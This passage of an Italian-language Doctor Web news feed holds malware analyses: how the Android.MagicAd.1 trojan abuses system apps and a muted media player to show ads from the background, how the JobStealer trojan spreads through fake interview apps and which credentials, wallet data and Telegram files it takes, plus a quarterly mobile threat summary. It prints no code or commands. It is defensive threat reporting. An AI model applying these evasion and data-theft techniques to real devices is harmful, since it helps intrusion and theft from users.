        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Esempi di annunci visualizzati da Android.MagicAd.1&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Una delle tecniche viene implementata tramite intent indirizzati ad altre applicazioni. Essa consente al trojan di aggirare le restrizioni delle versioni moderne di SO Android che impediscono ai programmi di avviare se stessi. A seconda del modello di dispositivo infetto, tramite questa tecnica &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; o mostra gli annunci esso stesso o "costringe" direttamente i programmi target a visualizzare i banner pubblicitari.&lt;/p&gt;

&lt;p&gt;In una delle varianti di questo metodo, il target del trojan sono:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        il browser Mi Browser sui dispositivi Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        la shell grafica Miui SystemUI sui dispositivi Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        il launcher Amazon Fire TV Home Screen sui dispositivi Amazon TV.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tutte queste sono applicazioni di sistema sui relativi dispositivi, pertanto sono in grado di elaborare intent anche quando non sono direttamente avviate dall'utente. Fino a quando questi programmi sono attivi e possono accettare intent, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; può utilizzarli per la visualizzazione di annunci.&lt;/p&gt;

&lt;p&gt;Va notato che se su un dispositivo Xiaomi Mi Browser è installato non come app di sistema, il trojan anche può utilizzare questo programma per la visualizzazione di pubblicità — fino a quando la finestra del browser non venga chiusa.&lt;/p&gt;

&lt;p&gt;Quando &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; scopre Mi Browser su un dispositivo adatto, invia un intent differito per l'avvio della pubblicità al proprio componente dex (rilevato da Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;). Quest'ultimo ne genera il proprio intent e lo passa al browser, il quale estrae l'intent originale e avvia la pubblicità in conformità ad esso.&lt;/p&gt;

&lt;p&gt;L'interazione con gli altri due programmi è leggermente diversa&amp;nbsp;— essi vengono utilizzati per reinvocare il trojan dalla modalità background. All'inizio &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; invia al modulo &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; l'intent differito per l'avvio della pubblicità, e quest'ultimo passa ai programmi target il proprio intent per il proprio risveglio. Se il target è l'app Miui SystemUI, essa invia in risposta il proprio intent per l'avvio del modulo. Il programma target Amazon Fire TV Home Screen, invece, avvia il modulo direttamente&amp;nbsp;— in base al nome del pacchetto. Avendo ottenuto il controllo, il modulo &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; avvia la pubblicità che ha ricevuto nell'intent differito dall'applicazione malevola principale.&lt;/p&gt;

&lt;p&gt;Se il trojan non ha potuto mostrare la pubblicità, cerca di adoperare questo metodo altre due volte e, se fallisce, prova a mostrare la pubblicità direttamente, senza più utilizzare gli intent differiti e il proprio modulo dex malevolo.&lt;/p&gt;

&lt;p&gt;Un'altra variazione di questo metodo è simile a quella precedente e viene impiegata per sfruttare programmi sui dispositivi Vivo. La differenza è che l'avvio della pubblicità avviene tramite Android Binder&amp;nbsp;— il componente di sistema che fornisce l'interazione tra processi. In questo caso, il trojan ha come target i seguenti programmi di sistema:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager,
    &lt;/li&gt;
    &lt;li&gt;
        Rubrica,
    &lt;/li&gt;
    &lt;li&gt;
        Vivo Browser,
    &lt;/li&gt;
    &lt;li&gt;
        Baidu IME Customized.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; li avvia tramite Android Binder inviando ad esso normali intent tramite il container di dati Parcel. Questi programmi quindi avviano il componente trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt;, il quale, dopo essere uscito dalla modalità background, mostra gli annunci.&lt;/p&gt;

&lt;p&gt;In &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sono anche previste alcune altre tecniche per la visualizzazione di pubblicità durante il funzionamento in background, tra cui l'utilizzo del lettore multimediale. A differenza dei metodi mirati ai dispositivi specifici, questo è un metodo universale e funziona sulla maggior parte dei modelli di vari produttori. &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; decifra dal suo corpo un file audio e lo salva nella directory di lavoro. Quindi il malware avvia la propria istanza del lettore multimediale di sistema, imposta in essa il volume al minimo e la associa al sistema di gestione multimediale globale di SO Android. Successivamente per l'avvio della pubblicità &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; registra un broadcast receiver che intercetta i clic in questo lettore. Il trojan quindi tramite un comando adb speciale simula le azioni utente facendo clic sul pulsante di registrazione nel lettore, dopodiché chiude subito la sua finestra. La pressione del pulsante provoca l'attivazione del media receiver di sistema, il quale consente ad &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; di intercettare il controllo e avviare la pubblicità.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space per dispositivi mobili rileva e rimuove in modo affidabile tutte le versioni conosciute del programma malevolo &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, pertanto per i nostri utenti esso non rappresenta alcun pericolo.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15253&amp;lng=it</guid><title>Invece di un lavoro — dati e soldi rubati. Trojan stealer che attacca utenti di macOS e Windows è nascosto in false app per colloqui online</title><link>https://news.drweb-av.it/show/?i=15253&amp;lng=it&amp;c=5</link><pubDate>Wed, 27 May 2026 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;strong&gt;Gli esperti Doctor Web avvertono della diffusione di JobStealer, un programma trojan che ruba informazioni confidenziali agli utenti di computer con macOS e Windows. In primo luogo, è mirato al furto di dati da portafogli di criptovalute. I truffatori, con il pretesto di colloqui di lavoro online, attirano le potenziali vittime verso siti malevoli dove invitano a installare un'applicazione per videoconferenze. In realtà, questo software è il trojan JobStealer.&lt;/strong&gt;&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;L'attacco inizia con una mossa dei malintenzionati che contattano le potenziali vittime e offrono loro una specifica posizione lavorativa vacante. Invitano gli utenti a un colloquio di lavoro e forniscono loro link ai siti delle "piattaforme" di riunioni online — presumibilmente per consentire loro di connettersi a una videoconferenza. Questi siti hanno un aspetto presentabile, ma in realtà sono fraudolenti. Da essi, sotto le apparenze di un'app per videoconferenze online, viene scaricato il programma malevolo JobStealer. I cybercriminali utilizzano diversi design per tali risorse internet, nonché cambiano i nomi del software stesso. I nostri specialisti hanno trovato le varianti con i nomi MeetLab, Juseo, Meetix, Carolla e altri ancora. In alcuni casi, i cybercriminali utilizzano i nomi di servizi reali, come Webex.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Esempi di siti di falsi servizi di videoconferenza da cui viene scaricato JobStealer&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Per far credere agli utenti che le piattaforme siano pienamente funzionanti, i truffatori creano i relativi canali telegram e account sui social network, ad esempio, X.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt;&lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Per camuffare il trojan da software legittimo, i malintenzionati creano l'apparenza di attività sui social network&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Per l'installazione dell'applicazione sui dispositivi macOS, ai visitatori dei siti malevoli vengono proposte due opzioni:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;copiare ed eseguire nel terminale il comando bash indicato sul sito web;&lt;/li&gt;
&lt;li&gt;scaricare il file dell'immagine disco in formato &lt;span class="string"&gt;.dmg&lt;/span&gt; e avviarlo.&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Si scarica il trojan JobStealer dai siti malevoli sia in forma di container dmg che eseguendo un comando bash nel terminale&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Nel primo caso, all'esecuzione del comando nel terminale, viene scaricato da internet ed eseguito automaticamente uno script che scarica e avvia il file eseguibile di JobStealer (viene rilevato come&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Nel secondo caso, l'immagine dmg suggerita per il download contiene inizialmente i file sopra elencati. Una volta montato, visualizza le istruzioni su come "installare" l'applicazione. Le istruzioni indicano che l'utente deve aprire il terminale e trascinare nella sua finestra lo script allegato. In realtà, anziché installare il software per videoconferenze, lo script avvierà il file trojan.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Immagine con le istruzioni, visualizzata all'apertura del file dell'immagine con il trojan JobStealer&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;è un file contenitore eseguibile in formato Fat Mach-O, contiene codice binario per più architetture di processore — x64 e arm64. A seconda della piattaforma del computer infetto, all'avvio del trojan viene inizializzato automaticamente il componente corrispondente al processore target.&lt;/p&gt;

&lt;p&gt;Va notato che esistono diverse versioni di&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;. Le versioni meno recenti dell'applicazione malevola non supportavano il funzionamento sui computer Mac con architettura arm64. Inoltre, non includevano l'offuscamento — una funzione che gli autori del malware hanno iniziato ad aggiungere e rafforzare con l'aggiornamento del stealer.&lt;/p&gt;

&lt;p&gt;Una volta avviato, &lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;visualizza una finestra di phishing dove informa di un presunto errore di funzionamento. Per "risolverlo", il programma malevolo chiede all'utente di inserire la password del suo account.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Finestra di phishing in cui viene richiesta la password dell'account dell'utente di Mac&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Quindi&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;raccoglie i seguenti dati:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;versione del sistema operativo e l'identificatore del computer;&lt;/li&gt;
&lt;li&gt;dati di circa 300 estensioni browser di portafogli di criptovalute, installate nei browser target su base Chomium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, CocCoc);&lt;/li&gt;
&lt;li&gt;file cookie da questi browser;&lt;/li&gt;
&lt;li&gt;password, nonché dettagli di carte bancarie, salvati nelle liste di compilazione moduli automatica del browser;&lt;/li&gt;
&lt;li&gt;file dell'applicazione di messaggistica Telegram dalle directory &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; e &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt;, dove vengono memorizzati le chiavi di autorizzazione della sessione, i file scaricati ecc.;&lt;/li&gt;
&lt;li&gt;note dell'utente dall'applicazione nativa Note di macOS;&lt;/li&gt;
&lt;li&gt;dati sulla presenza nel sistema delle applicazioni di portafogli di criptovalute Ledger Live e Trezor Suite.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Questi dati vengono compressi in archivio ZIP e caricati sul Server C2.&lt;/p&gt;

&lt;p&gt;Gli autori del malware hanno preparato una versione del trojan JobStealer anche per i computer con SO Windows. Le sue funzionalità sono analoghe a quelle della versione per macOS. Inoltre, su alcuni siti malevoli che distribuiscono lo stealer, sono previste sezioni per il download dell'applicazione su altri sistemi operativi popolari. Tuttavia, al momento, i nostri analisti dei virus non hanno registrato la distribuzione di tale software. Ad esempio, il pulsante di download del programma per SO Linux o è inattiva o porta alla versione Windows del trojan. Mentre le sezioni dedicate al download del programma per dispositivi basati su iOS e Android informano che queste versioni siano in fase di sviluppo. Allo stesso tempo, non si può escludere che in futuro i malintenzionati inizieranno a distribuire anche le varianti del trojan per queste piattaforme.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Siti malevoli potenzialmente possono distribuire le versioni del trojan JobStealer per Linux, iOS e Android&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Tutte le versioni conosciute dell'applicazione malevola JobStealer vengono rilevate ed eliminate in modo affidabile dai prodotti antivirus Dr.Web Security Space per macOS e Windows e non rappresentano minaccia per i nostri utenti. I siti fraudolenti che distribuiscono il trojan sono aggiunti al database delle risorse non raccomandate e pericolose e anche vengono bloccati da Dr.Web.
&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;

&lt;p&gt;Abbiamo analizzato il malware JobStealer tramite il framework MITRE&amp;nbsp;ATT&amp;amp;CK®, una matrice che descrive le tattiche e tecniche dei cybercriminali che attaccano sistemi informatici. Sono state individuate le seguenti tecniche chiave:&lt;/p&gt;

&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Fase&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;Tecnica&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Esecuzione&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;Esecuzione con la partecipazione dell'utente (T1204)&lt;/p&gt;
&lt;p&gt;Copia e incolla malevolo (T1204.004)&lt;/p&gt;
&lt;p&gt;File malevolo (T1204.002)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Individuazione&lt;/td&gt;
&lt;td&gt;Individuazione di file e cartelle (T1083)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Raccolta dei dati&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Raccolta automatizzata (T1119)&lt;/p&gt;
&lt;p&gt;Dati dal sistema locale (T1005)&lt;/p&gt;
&lt;p&gt;Credenziali dagli archivi di password (T1555)&lt;/p&gt;
&lt;p&gt;Accesso Portachiavi (T1555.001)&lt;/p&gt;
&lt;p&gt;Credenziali dai browser (T1555.003)&lt;/p&gt;
&lt;p&gt;Intercettazione dei dati di input (T1056)&lt;/p&gt;
&lt;p&gt;Intercettazione dell'input nell'interfaccia grafica (T1056.002)&lt;/p&gt;
&lt;p&gt;Archiviazione dei dati raccolti (T1560)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Comando e controllo&lt;/td&gt;
&lt;td&gt;Servizio web (T1102)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Esfiltrazione dei dati&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Esfiltrazione automatizzata (T1020)&lt;/p&gt;
&lt;p&gt;Esfiltrazione tramite il canale C2 (T1041)&lt;/p&gt;
&lt;p&gt;Esfiltrazione tramite il servizio web (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;
&lt;p&gt;Maggiori informazioni su&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15257&amp;lng=it</guid><title>Modificati i periodi di supporto dei prodotti Dr.Web</title><link>https://news.drweb-av.it/show/?i=15257&amp;lng=it&amp;c=5</link><pubDate>Tue, 26 May 2026 12:22:03 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;In conformità alla politica del ciclo di vita, sono stati estesi i periodi di supporto di una serie di prodotti Dr.Web.&lt;/newslead&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Pannello di controllo di Dr.Web Enterprise Security Suite, versione 13.0&lt;/li&gt;&lt;li&gt;Dr.Web Industrial, versione 13.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Desktop Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 per postazioni Windows&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 per postazioni macOS&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 per postazioni Linux&lt;/li&gt;&lt;li&gt;Dr.Web Katana Business Edition 1.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Server Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 per server Windows&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 per server UNIX&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 per server macOS&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Mail Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 per mail server UNIX&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 per Microsoft Exchange Server&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Gateway Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 per gateway internet UNIX&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Mobile Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 per dispositivi mobili Android&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Le informazioni aggiornate sui periodi di supporto sono disponibili sulla pagina del ciclo di vita dei prodotti.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15136&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in I trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15136&amp;lng=it&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 aprile 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel I trimestre 2026 è continuato il calo dell'attività dei programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, che visualizzano annunci pubblicitari invadenti. Quelli primi venivano rilevati sui dispositivi protetti il 32,70% e quelli secondi il 7,09% in meno rispetto al IV trimestre dell'anno scorso. Hanno ceduto la posizione leader ai trojan bancari della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, la cui attività negli ultimi 3 mesi è aumentata di oltre 2,5 volte. Di conseguenza, questi ultimi sono diventati le minacce Android più diffuse. Tali applicazioni malevole intercettano gli SMS con codici monouso per la conferma di operazioni bancarie, visualizzano finestre di phishing, e inoltre, possono imitare l'aspetto esteriore dei veri software bancari per rubare i dati confidenziali. Il più delle volte, gli utenti riscontravano i trojan della sottofamiglia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, che include una varietà di programmi malevoli.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Sono state largamente diffuse nel I trimestre (il 15,35% del numero totale di rilevamenti) le applicazioni in cui tramite gli strumenti hacker per il modding NP Manager è aggiunto il codice spazzatura allo scopo di confondere la logica. Dall'autunno dello scorso anno questi strumenti vengono attivamente utilizzati nei trojan della famiglia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; per contrastare il rilevamento da parte degli antivirus, pertanto, noi avvertiamo che una determinata applicazione è stata modificata. I prodotti antivirus Dr.Web rilevano i simili programmi come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Un altro software potenzialmente pericoloso, nonostante un calo del numero di rilevamenti del 31,65%, di nuovo sono stati i programmi modificati con l'ausilio dell'utility NP Manager (Dr.Web li rileva come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;). Questa utility contiene diversi moduli per la protezione e l'offuscamento del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. I cybercriminali la utilizzano per la protezione dei malware allo scopo di ostacolarne il rilevamento da parte degli antivirus.&lt;/p&gt;

&lt;p&gt;Le applicazioni indesiderate più diffuse sono stati i falsi antivirus &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; che rilevano presunte minacce, per "eliminare" le quali, richiedono l'acquisto di una versione completa. Inoltre, gli utenti di nuovo dovevano affrontare i programmi dalle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;. Quelli primi presumibilmente consentirebbero di guadagnare con lo svolgimento di vari compiti. Quelli secondi rappresentano software modificati tramite il servizio cloud CloudInject. Tramite questo servizio, alle applicazioni vengono aggiunti pericolose autorizzazioni di sistema e un codice offuscato, le cui funzionalità è impossibile controllare.&lt;/p&gt;

&lt;p&gt;Tra i software pubblicitari, leader per numero di rilevamenti sono diventati i programmi di ottimizzazione &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Creano periodicamente notifiche con messaggi fuorvianti su presunti memoria insufficiente ed errori di sistema. Il loro obiettivo è di visualizzare annunci pubblicitari durante "l'ottimizzazione". Un altro popolare software pubblicitario sono state le applicazioni &lt;b&gt;Adware.Opensite.15&lt;/b&gt;, che i malintenzionati spacciano per strumenti di cheat per l'ottenimento di risorse in giochi. In realtà, tali programmi caricano vari siti con annunci. Di nuovo erano diffusi anche i programmi con moduli pubblicitari incorporati &lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

